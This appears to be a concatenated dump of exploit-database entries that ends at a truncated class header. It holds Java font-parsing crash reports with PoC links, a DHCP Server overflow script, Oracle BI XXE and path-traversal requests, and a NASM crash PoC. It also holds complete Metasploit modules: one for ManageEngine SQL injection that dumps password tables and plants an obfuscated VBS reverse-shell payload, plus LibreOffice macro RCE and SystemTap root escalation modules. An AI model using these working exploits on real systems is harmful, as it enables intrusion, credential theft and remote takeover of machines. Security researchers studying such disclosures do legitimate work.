==245623== by 0x40C02FBA: LookupProcessor::applySingleLookup(unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40BEBC9C: ContextualSubstitutionBase::applySubstitutionLookups(LookupProcessor const*, LEReferenceToArrayOf<SubstitutionLookupRecord> const&, unsigned short, GlyphIterator*, LEFontInstance const*, int, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40BEE766: ChainingContextualSubstitutionFormat3Subtable::process(LETableReference const&, LookupProcessor const*, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40BEE8E3: ChainingContextualSubstitutionSubtable::process(LEReferenceTo<ChainingContextualSubstitutionSubtable> const&, LookupProcessor const*, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40BF475B: GlyphSubstitutionLookupProcessor::applySubtable(LEReferenceTo<LookupSubtable> const&, unsigned short, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const [clone .part.11] (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40C01DCE: LookupProcessor::applyLookupTable(LEReferenceTo<LookupTable> const&, GlyphIterator*, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40C02EAB: LookupProcessor::process(LEGlyphStorage&, GlyphPositionAdjustments*, char, LEReferenceTo<GlyphDefinitionTableHeader> const&, LEFontInstance const*, LEErrorCode&) const (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== Address 0x3f68a55c is 4 bytes before a block of size 104 alloc'd
==245623== at 0x4C2BBEF: malloc (vg_replace_malloc.c:299)
==245623== by 0x40BFD4CF: LEGlyphStorage::allocateGlyphArray(int, char, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40BE875A: ArabicOpenTypeLayoutEngine::characterProcessing(unsigned short const*, int, int, int, char, unsigned short*&, LEGlyphStorage&, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40C0815F: OpenTypeLayoutEngine::computeGlyphs(unsigned short const*, int, int, int, char, LEGlyphStorage&, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40BFE55D: LayoutEngine::layoutChars(unsigned short const*, int, int, int, char, float, float, LEErrorCode&) (in jre/8u202/lib/amd64/libfontmanager.so)
==245623== by 0x40C0E91F: Java_sun_font_SunLayoutEngine_nativeLayout (in jre/8u202/lib/amd64/libfontmanager.so)
[...]
--- cut ---
or with AFL's libdislocator under gdb:
--- cut ---
Continuing.
Iteration (0,0)
*** [AFL] bad allocator canary on free() ***
Thread 2 "java" received signal SIGABRT, Aborted.
[...]
Stopped reason: SIGABRT
__GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51
51 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory.
gdb$ where
#0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51
#1 0x00007ffff72313fa in __GI_abort () at abort.c:89
#2 0x00007ffff7bd651c in free () from libdislocator/libdislocator.so
#3 0x00007fffb892f2b2 in LEGlyphStorage::reset() () from jre/8u202/lib/amd64/libfontmanager.so
#4 0x00007fffb8939ff4 in OpenTypeLayoutEngine::~OpenTypeLayoutEngine() ()
from jre/8u202/lib/amd64/libfontmanager.so
#5 0x00007fffb891a66f in ArabicOpenTypeLayoutEngine::~ArabicOpenTypeLayoutEngine() ()
from jre/8u202/lib/amd64/libfontmanager.so
#6 0x00007fffb8940990 in Java_sun_font_SunLayoutEngine_nativeLayout ()
from jre/8u202/lib/amd64/libfontmanager.so
#7 0x00007fffe5e376c7 in ?? ()
#8 0x0000000000000000 in ?? ()
--- cut ---
On Windows, the crash also reliably reproduces with PageHeap enabled for the java.exe process:
--- cut ---
(1184.4c60): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
fontmanager!Java_sun_java2d_loops_DrawGlyphListLCD_DrawGlyphListLCD+0x14bf:
00007ffa`0d6291bf 428124810000ffff and dword ptr [rcx+r8*4],0FFFF0000h ds:00000000`39663ffc=????????
--- cut ---
We have encountered crashes in the libfontmanager!GlyphIterator::setCurrGlyphID function while trying to write before and after a heap allocation. Attached with this report are two mutated testcases (for the buffer under- and overflow), and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46723.zip
A heap corruption was observed in Oracle Java Runtime Environment version 8u202 (latest at the time of this writing) while fuzz-testing the processing of TrueType, implemented in a proprietary t2k library. It manifests itself in the form of the following (or similar) crash:
--- cut ---
$ bin/java -cp . DisplaySfntFont test.ttf
Iteration (0,0)
*** Error in `bin/java': munmap_chunk(): invalid pointer: 0x00007f5cf82a6490 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x70bcb)[0x7f5cfd492bcb]
/lib/x86_64-linux-gnu/libc.so.6(+0x76f96)[0x7f5cfd498f96]
jre/8u202/lib/amd64/libt2k.so(+0x5443d)[0x7f5cd563343d]
jre/8u202/lib/amd64/libt2k.so(+0x47b95)[0x7f5cd5626b95]
jre/8u202/lib/amd64/libt2k.so(Java_sun_font_T2KFontScaler_getGlyphImageNative+0xe5)[0x7f5cd560fa25]
[0x7f5ce83a06c7]
======= Memory map: ========
00400000-00401000 r-xp 00000000 fe:01 20840680 jre/8u202/bin/java
00600000-00601000 r--p 00000000 fe:01 20840680 jre/8u202/bin/java
00601000-00602000 rw-p 00001000 fe:01 20840680 jre/8u202/bin/java
02573000-02594000 rw-p 00000000 00:00 0 [heap]
3d1a00000-3fba00000 rw-p 00000000 00:00 0
3fba00000-670900000 ---p 00000000 00:00 0
670900000-685900000 rw-p 00000000 00:00 0
685900000-7c0000000 ---p 00000000 00:00 0
7c0000000-7c00c0000 rw-p 00000000 00:00 0
7c00c0000-800000000 ---p 00000000 00:00 0
[...]
Aborted
--- cut ---
The crash reproduces on both Windows and Linux platforms. On Linux, it can be also triggered under Valgrind (many out-of-bounds reads and writes in sc_FindExtrema4 were ommitted in the log below):
--- cut ---
$ valgrind bin/java -cp . DisplaySfntFont test.ttf
[...]
==211051== Invalid write of size 8
==211051== at 0x415B30EE: sc_FindExtrema4 (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x4159A402: fs_FindBitMapSize4 (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415D3247: MakeBWBits (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415CAE44: T2K_RenderGlyphInternal (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415CB3CA: T2K_RenderGlyph (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415B4A24: Java_sun_font_T2KFontScaler_getGlyphImageNative (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x7B8D6C6: ???
==211051== by 0x7B7CDCF: ???
==211051== by 0x7B7CDCF: ???
==211051== by 0x7B7CDCF: ???
==211051== by 0x7B7D2BC: ???
==211051== by 0x7B7CA8F: ???
==211051== Address 0x3f6f1d38 is 19,160 bytes inside a block of size 19,166 alloc'd
==211051== at 0x4C2BBEF: malloc (vg_replace_malloc.c:299)
==211051== by 0x415D84A4: tsi_AllocMem (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415B2664: sc_FindExtrema4 (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x4159A402: fs_FindBitMapSize4 (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415D3247: MakeBWBits (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415CAE44: T2K_RenderGlyphInternal (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415CB3CA: T2K_RenderGlyph (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x415B4A24: Java_sun_font_T2KFontScaler_getGlyphImageNative (in jre/8u202/lib/amd64/libt2k.so)
==211051== by 0x7B8D6C6: ???
==211051== by 0x7B7CDCF: ???
==211051== by 0x7B7CDCF: ???
==211051== by 0x7B7CDCF: ???
[...]
--- cut ---
or with AFL's libdislocator under gdb:
--- cut ---
Thread 2 "java" received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
[...]
R11: 0x7fffb5d89e82 --> 0x0
[...]
EFLAGS: 0x10293 (CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x7fffb63be972 <sc_FindExtrema4+914>: lea r11,[r12+r9*2]
0x7fffb63be976 <sc_FindExtrema4+918>: je 0x7fffb63bea30 <sc_FindExtrema4+1104>
0x7fffb63be97c <sc_FindExtrema4+924>: lea r9d,[r8-0x1]
=> 0x7fffb63be980 <sc_FindExtrema4+928>: add WORD PTR [r11],0x1
0x7fffb63be985 <sc_FindExtrema4+933>: test r9d,r9d
0x7fffb63be988 <sc_FindExtrema4+936>: je 0x7fffb63bea30 <sc_FindExtrema4+1104>
0x7fffb63be98e <sc_FindExtrema4+942>: add WORD PTR [r11+0x2],0x1
0x7fffb63be994 <sc_FindExtrema4+948>: cmp r8d,0x2
[...]
--- cut ---
On Windows, the crash also reliably reproduces with PageHeap enabled for the java.exe process:
--- cut ---
(244c.1660): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Java\jre1.8.0_202\bin\server\jvm.dll -
jvm+0x8598:
00000000`61158598 c7040801000000 mov dword ptr [rax+rcx],1 ds:00000000`05860280=00000001
--- cut ---
In total, we have encountered crashes in the t2k!sc_FindExtrema4 function in three different locations, in two cases while adding 1 to an invalid memory location, and in one case while adding 2 to an out-of-bounds address. Attached with this report are three mutated testcases (one for each crashing code location), and a simple Java program used to reproduce the vulnerability by loading TrueType fonts specified through a command-line parameter.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46722.zip
#Exploit Title: DHCP Server 2.5.2 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-04-16
#Vendor Homepage: http://www.dhcpserver.de/cms/
#Software Link: http://www.dhcpserver.de/cms/wp-content/plugins/download-attachments
#Tested Version: 2.5.2
#Tested on: Windows 7 x32 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: DHCPSRV_2.5.2.py
#2.- Open dhcp.txt and copy content to clipboard
#2.- Open dhcpwiz.exe
#3.- Click Next
#4.- In Network Interface cards Select "Local Area Connection" and click on Next
#5.- In Supported Protocols click on Next
#6.- In Configuring DHCP for Interface Select "DHCP Options"
#7.- Select "Bootfile" field and Paste ClipBoard
#8.- Crashed
cod = "\x41" * 6000
f = open('dhcp.txt', 'w')
f.write(cod)
f.close()
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => "ManageEngine Applications Manager 11.0 < 14.0 SQL Injection / Remote Code Execution",
'Description' => %q(
This module exploits sql and command injection vulnerability in the ManageEngine AM 14 and prior versions.
An unauthenticated user can gain the authority of "system" on the server due to SQL injection vulnerability.
Exploit allows the writing of the desired file to the system using the postgesql structure.
Module is written over the payload by selecting a file with the extension ".vbs" that is used for monitoring
by the ManageEngine which working with "system" authority.
In addition, it dumps the users and passwords from the database for us.
Keep in mind! After the harmful ".vbs" file is written, the shell session may be a bit late.
Because the ManageEngine application should run this file itself.
),
'License' => MSF_LICENSE,
'Author' =>
[
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
],
'References' =>
[
['URL', 'https://pentest.com.tr/exploits/ManageEngine-App-Manager-14-SQLi-Remote-Code-Execution.html']
],
'DefaultOptions' =>
{
'WfsDelay' => 500,
'PAYLOAD' => 'windows/shell_reverse_tcp',
'RPORT' => 8443,
'SSL' => true
},
'Payload' =>
{
'Encoder' => 'x86/shikata_ga_nai'
},
'Platform' => ['win'],
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' =>
[
['AppManager 14', {}],
['AppManager 13', {}],
['AppManager 12', {}],
['AppManager 11', {}]
],
'Privileged' => true,
'DisclosureDate' => 'Apr 17 2019',
'DefaultTarget' => 1))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the application', '/'])
]
)
end
##
# Check exploit vulnerability basically // 'Appears' more convenient
##
def check
res = inject(Rex::Text.rand_text_alpha(1))
if res.code = "200" && res.headers['set-cookie'] =~ /JSESSIONID/
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
##
# VBS payload and Post Data preparation
##
def get_payload
handler
payload = generate_payload_exe
@vbs_content = Msf::Util::EXE.to_exe_vbs(payload)
## determining the target directory
if target.name == 'AppManager 14'
tfile = "AppManager14"
elsif target.name == 'AppManager 13'
tfile = "AppManager13"
elsif target.name == 'AppManager 12'
tfile = "AppManager12"
elsif target.name == 'AppManager 11'
tfile = "AppManager11"
end
fhashes = Rex::Text.rand_text_alpha_lower(8) + ".txt"
## parameters required to read the user table
hashes = "sid=1;copy+(select+username,password+from+AM_UserPasswordTable)+to+$$"
hashes << "c:\\Program+Files+(x86)\\ManageEngine\\"
hashes << "#{tfile}"
hashes << "\\working\\"
hashes << "#{fhashes}"
hashes << "$$;--"
res = inject("#{hashes}")
if res.code = "200" && res.headers['set-cookie'] =~ /JSESSIONID/
print_good("Users in the database were taken...")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "#{fhashes}") # users file url
})
if res.code == "404"
fail_with(Failure::Unreachable, 'The database could not be read!')
else
print_status("--------------------Usernames and Passwords---------------------")
puts res.body # users table output
print_status("----------------------------------------------------------------")
end
else
fail_with(Failure::Unreachable, 'Connection error occurred!')
end
## fetch base64 part in vbs payload
pb64 = @vbs_content.split('"
Dim')[0].split(' = "')[2]
## vbs file in one line
vbs_file = 'On Error Resume Next:Set objWbemLocator = CreateObject("WbemScripting.SWbemLocator"):'
vbs_file << 'if Err.Number Then:WScript.Echo vbCrLf & "Error # " & " " & Err.Description:End If:O'
vbs_file << 'n Error GoTo 0:On Error Resume Next:Select Case WScript.Arguments.Count:Case 2:strCo'
vbs_file << 'mputer = Wscript.Arguments(0):strQuery = Wscript.Arguments(1):Set wbemServices = obj'
vbs_file << 'WbemLocator.ConnectServer (strComputer,"Root\\CIMV2"):Case 4:strComputer = Wscript.A'
vbs_file << 'rguments(0):strUsername = Wscript.Arguments(1):strPassword = Wscript.Arguments(2):st'
vbs_file << 'rQuery = Wscript.Arguments(3):Set wbemServices = objWbemLocator.ConnectServer (strCo'
vbs_file << 'mputer,"Root\\CIMV2",strUsername,strPassword):case 6:strComputer = Wscript.Arguments'
vbs_file << '(0):strUsername = Wscript.Arguments(1):strPassword = Wscript.Arguments(2):strQuery ='
vbs_file << ' Wscript.Arguments(4):namespace = Wscript.Arguments(5):Set wbemServices = objWbemLoca'
vbs_file << 'tor.ConnectServer (strComputer,namespace,strUsername,strPassword):Case Else:strMsg ='
vbs_file << ' "Error # in parameters passed":WScript.Echo strMsg:WScript.Quit(0):End Select:Set w'
vbs_file << 'bemServices = objWbemLocator.ConnectServer (strComputer, namespace, strUsername, str'
vbs_file << 'Password):if Err.Number Then:WScript.Echo vbCrLf & "Error # " & " " & Err.Descriptio'
vbs_file << 'n:End If:On Error GoTo 0:On Error Resume Next:Set colItems = wbemServices.ExecQuery(s'
vbs_file << 'trQuery):if Err.Number Then:WScript.Echo vbCrLf & "Error # " & " " & Err.Description'
vbs_file << ':End If:On Error GoTo 0:i=0:For Each objItem in colItems:if i=0 then:header = "":For '
vbs_file << 'Each param in objItem.Properties_:header = header & param.Name & vbTab:Next:WScript.E'
vbs_file << 'cho header:i=1:end if:serviceData = "":For Each param in objItem.Properties_:serviceD'
vbs_file << 'ata = serviceData & param.Value & vbTab:Next:WScript.Echo serviceData:Next:Function b'
vbs_file << 'PBdVfYpfCEHF(hBPVZMitxq):HHgwqsqii = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-m'
vbs_file << 'icrosoft-com:datatypes" & Chr(34) & " " & "dt:dt=" & Chr(34) & "bin.base64" & Chr(34)'
vbs_file << ' & ">" & hBPVZMitxq & "</B64DECODE>":Set TInPBSeVlL = CreateObject("MSXML2.DOMDocument'
vbs_file << '.3.0"):TInPBSeVlL.LoadXML(HHgwqsqii):bPBdVfYpfCEHF = TInPBSeVlL.selectsinglenode("B64D'
vbs_file << 'ECODE").nodeTypedValue:set TInPBSeVlL = nothing:End Function:Function txhYXYJJl():Emkf'
vbs_file << 'dMDdusgGha = "'
vbs_file << "#{pb64}"
vbs_file << '":Dim CCEUdwNSS:Set CCEUdwNSS = CreateObject("Scripting.FileSystemObject"):Dim zhgqIZn'
vbs_file << 'K:Dim gnnTqZvAcL:Set zhgqIZnK = CCEUdwNSS.GetSpecialFolder(2):gnnTqZvAcL = zhgqIZnK & '
vbs_file << '"\" & CCEUdwNSS.GetTempName():CCEUdwNSS.CreateFolder(gnnTqZvAcL):yZUoLXnPic = gnnTqZvAc'
vbs_file << 'L & "\" & "SAEeVSXQVkDEIG.exe":Dim mEciydMZTsoBmAo:Set mEciydMZTsoBmAo = CreateObject("'
vbs_file << 'Wscript.Shell"):LXbjZKnEQUfaS = bPBdVfYpfCEHF(EmkfdMDdusgGha):Set TUCiiidRgJQdxTl = Cre'
vbs_file << 'ateObject("ADODB.Stream"):TUCiiidRgJQdxTl.Type = 1:TUCiiidRgJQdxTl.Open:TUCiiidRgJQdxT'
vbs_file << 'l.Write LXbjZKnEQUfaS:TUCiiidRgJQdxTl.SaveToFile yZUoLXnPic, 2:mEciydMZTsoBmAo.run yZU'
vbs_file << 'oLXnPic, 0, true:CCEUdwNSS.DeleteFile(yZUoLXnPic):CCEUdwNSS.DeleteFolder(gnnTqZvAcL):E'
vbs_file << 'nd Function:txhYXYJJl:WScript.Quit(0)'
## encode the vbs file to base64 and then encode the url-hex
encoding_vbs = Rex::Text.uri_encode(Rex::Text.encode_base64(vbs_file), 'hex-all')
## post preparation // creating and writing files on the server with SQLi
vbs_payload = "sid=1;copy+(select+convert_from(decode($$#{encoding_vbs}$$,$$base64$$)"
vbs_payload << ",$$utf-8$$))+to+$$C:\\\\Program+Files+(x86)\\\\ManageEngine\\\\"
vbs_payload << "#{tfile}"
vbs_payload << "\\\\working\\\\conf\\\\application\\\\scripts\\\\wmiget.vbs$$;"
res = inject("#{vbs_payload}")
if res.code = "200" && res.headers['set-cookie'] =~ /JSESSIONID/
print_good("The harmful .vbs file was successfully written to the server.")
print_status("Keep in mind! You may have to wait between 10-300 seconds for the shell session.")
else
fail_with(Failure::Unreachable, 'Connection error occurred!')
end
return payload
end
##
# Call functions
##
def exploit
unless Exploit::CheckCode::Appears == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
print_status("Payload is preparing...")
get_payload
end
##
# Inj payload
##
def inject(payload)
res = send_request_cgi(
{
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, '/jsp/Popup_SLA.jsp'),
'data' => payload
}, 25)
end
end
##
# The end of the adventure (o_O) // AkkuS
##
Exploit Title: Code execution via path traversal
# Date: 17-04-2019
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: http://evernote.com/
# Software Link: https://evernote.com/download
# Version: 7.9
# Tested on: macOS Mojave v10.14.4
# CVE: CVE-2019-10038
# References:
# https://nvd.nist.gov/vuln/detail/CVE-2019-10038
# https://www.inputzero.io/2019/04/evernote-cve-2019-10038.html
Summary:
A local file path traversal issue exists in Evernote 7.9 for macOS which
allows an attacker to execute arbitrary programs.
Technical observation:
A crafted URI can be used in a note to perform this attack using file:///
has an argument or by traversing to any directory like
(../../../../something.app).
Since, Evernote also has a feature of sharing notes, in such case attacker
could leverage this vulnerability and send crafted notes (.enex) to the
victim to perform any further attack.
Patch:
The patch for this issue is released in Evernote 7.10 Beta 1 for macOS
[MACOSNOTE-28840]. Also, the issue is tracked by CVE-2019-10038.
# Exploit Title: XXE in Oracle Business Intelligence and XML Publisher
# Date: 16.04.19
# Exploit Author: @vah_13
# Vendor Homepage: http://oracle.com
# Software Link:
https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
# Tested on: Windows
# CVE : CVE-2019-2616 (7.2/10)
PoC:
POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101
Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Length: 76
Content-Type: text/xml; charset=UTF-8
<!DOCTYPE soap:envelope PUBLIC "-//B/A/EN" "http://IP/123 <http://ehost/123>
">
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Powershell
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'LibreOffice Macro Code Execution',
'Description' => %q{
LibreOffice comes bundled with sample macros written in Python and
allows the ability to bind program events to them. A macro can be tied
to a program event by including the script that contains the macro and
the function name to be executed. Additionally, a directory traversal
vulnerability exists in the component that references the Python script
to be executed. This allows a program event to execute functions from Python
scripts relative to the path of the samples macros folder. The pydoc.py script
included with LibreOffice contains the tempfilepager function that passes
arguments to os.system, allowing RCE.
This module generates an ODT file with a mouse over event that
when triggered, will execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Alex Inführ', # Vulnerability discovery and PoC
'Shelby Pace' # Metasploit Module
],
'References' =>
[
[ 'CVE', '2018-16858' ],
[ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
],
'Platform' => [ 'win', 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' =>
[
[
'Windows',
{
'Platform' => 'win',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Payload' => 'windows/meterpreter/reverse_tcp',
'DefaultOptions' => { 'PrependMigrate' => true }
}
],
[
'Linux',
{
'Platform' => 'linux',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Payload' => 'linux/x86/meterpreter/reverse_tcp',
'DefaultOptions' => { 'PrependFork' => true },
'CmdStagerFlavor' => 'printf',
}
]
],
'DisclosureDate' => "Oct 18, 2018",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
])
end
def gen_windows_cmd
opts =
{
:remove_comspec => true,
:method => 'reflection',
:encode_final_payload => true
}
@cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
@cmd << ' && echo'
end
def gen_linux_cmd
@cmd = generate_cmdstager.first
@cmd << ' && echo'
end
def gen_file(path)
text_content = Rex::Text.rand_text_alpha(10..15)
# file from Alex Inführ's PoC post referenced above
fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
libre_file = ERB.new(fodt_file).result(binding())
libre_file
rescue Errno::ENOENT
fail_with(Failure::NotFound, 'Cannot find template file')
end
def exploit
path = '../../../program/python-core-3.5.5/lib/pydoc.py'
if datastore['TARGET'] == 0
gen_windows_cmd
elsif datastore['TARGET'] == 1
gen_linux_cmd
else
fail_with(Failure::BadConfig, 'A formal target was not chosen.')
end
fodt_file = gen_file(path)
file_create(fodt_file)
end
end
# Exploit Title: Directory traversal in Oracle Business Intelligence
# Date: 16.04.19
# Exploit Author: @vah_13
# Vendor Homepage: http://oracle.com
# Software Link:
https://www.oracle.com/technetwork/middleware/bi-enterprise-edition/downloads/index.html
# Version: 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0
# Tested on: Windows
# CVE : CVE-2019-2588
PoC
http://server:9502/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini
# Exploit Title: Netwide Assembler (NASM) 2.14rc15 NULL Pointer Dereference (PoC)
# Date: 2018-09-05
# Exploit Author: Fakhri Zulkifli
# Vendor Homepage: https://www.nasm.us/
# Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D
# Version: 2.14rc15 and earlier
# Tested on: 2.14rc15
# CVE : CVE-2018-16517
asm/labels.c in Netwide Assembler (NASM) is prone to NULL Pointer Dereference, which allows the attacker to cause a denial of service via a crafted file.
PoC:
1. echo "equ push rax" > poc
2. nasm -f elf poc
insn_is_label remains FALSE and therefore leaving result->label assigned to NULL which is then dereference in islocal().
[...]
if (i == TOKEN_ID || (insn_is_label && i == TOKEN_INSN)) { <-- not taken
/* there's a label here */
first = false;
result->label = tokval.t_charptr;
i = stdscan(NULL, &tokval);
if (i == ':') { /* skip over the optional colon */
i = stdscan(NULL, &tokval);
} else if (i == 0) {
nasm_error(ERR_WARNING | ERR_WARN_OL | ERR_PASS1,
"label alone on a line without a colon might be in error");
}
if (i != TOKEN_INSN || tokval.t_integer != I_EQU) {
/*
* FIXME: location.segment could be NO_SEG, in which case
* it is possible we should be passing 'absolute.segment'. Look into this.
* Work out whether that is *really* what we should be doing.
* Generally fix things. I think this is right as it is, but
* am still not certain.
*/
define_label(result->label,
in_absolute ? absolute.segment : location.segment,
location.offset, true);
[...]
static bool islocal(const char *l)
{
if (tasm_compatible_mode) {
if (l[0] == '@' && l[1] == '@')
return true;
}
return (l[0] == '.' && l[1] != '.'); <-- boom
}
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'SystemTap MODPROBE_OPTIONS Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges by exploiting a
vulnerability in the `staprun` executable included with SystemTap
version 1.3.
The `staprun` executable does not clear environment variables prior to
executing `modprobe`, allowing an arbitrary configuration file to be
specified in the `MODPROBE_OPTIONS` environment variable, resulting
in arbitrary command execution with root privileges.
This module has been tested successfully on:
systemtap 1.2-1.fc13-i686 on Fedora 13 (i686); and
systemtap 1.1-3.el5 on RHEL 5.5 (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tavis Ormandy', # Discovery and exploit
'bcoles' # Metasploit
],
'DisclosureDate' => '2010-11-17',
'References' =>
[
['BID', '44914'],
['CVE', '2010-4170'],
['EDB', '15620'],
['URL', 'https://securitytracker.com/id?1024754'],
['URL', 'https://access.redhat.com/security/cve/cve-2010-4170'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=653604'],
['URL', 'https://lists.fedoraproject.org/pipermail/package-announce/2010-November/051115.html'],
['URL', 'https://bugs.launchpad.net/bugs/677226'],
['URL', 'https://www.debian.org/security/2011/dsa-2348']
],
'Platform' => ['linux'],
'Arch' =>
[
ARCH_X86,
ARCH_X64,
ARCH_ARMLE,
ARCH_AARCH64,
ARCH_PPC,
ARCH_MIPSLE,
ARCH_MIPSBE
],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['Auto', {}]],
'DefaultTarget' => 0))
register_options [
OptString.new('STAPRUN_PATH', [true, 'Path to staprun executable', '/usr/bin/staprun'])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def staprun_path
datastore['STAPRUN_PATH']
end
def base_dir
datastore['WritableDir'].to_s
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_chmodx(path, data)
upload path, data
chmod path
end
def check
# On some systems, staprun execution is restricted to stapusr group:
# ---s--x---. 1 root stapusr 178488 Mar 28 2014 /usr/bin/staprun
unless cmd_exec("test -x '#{staprun_path}' && echo true").include? 'true'
vprint_error "#{staprun_path} is not executable"
return CheckCode::Safe
end
vprint_good "#{staprun_path} is executable"
unless setuid? staprun_path
vprint_error "#{staprun_path} is not setuid"
return CheckCode::Safe
end
vprint_good "#{staprun_path} is setuid"
CheckCode::Detected
end
def exploit
unless check == CheckCode::Detected
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
payload_name = ".#{rand_text_alphanumeric 10..15}"
payload_path = "#{base_dir}/#{payload_name}"
upload_and_chmodx payload_path, generate_payload_exe
config_path = "#{base_dir}/#{payload_name}.conf"
upload config_path, "install uprobes /bin/sh"
print_status 'Executing payload...'
res = cmd_exec "echo '#{payload_path}&' | MODPROBE_OPTIONS='-C #{config_path}' #{staprun_path} -u #{rand_text_alphanumeric 10..15}"
vprint_line res
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
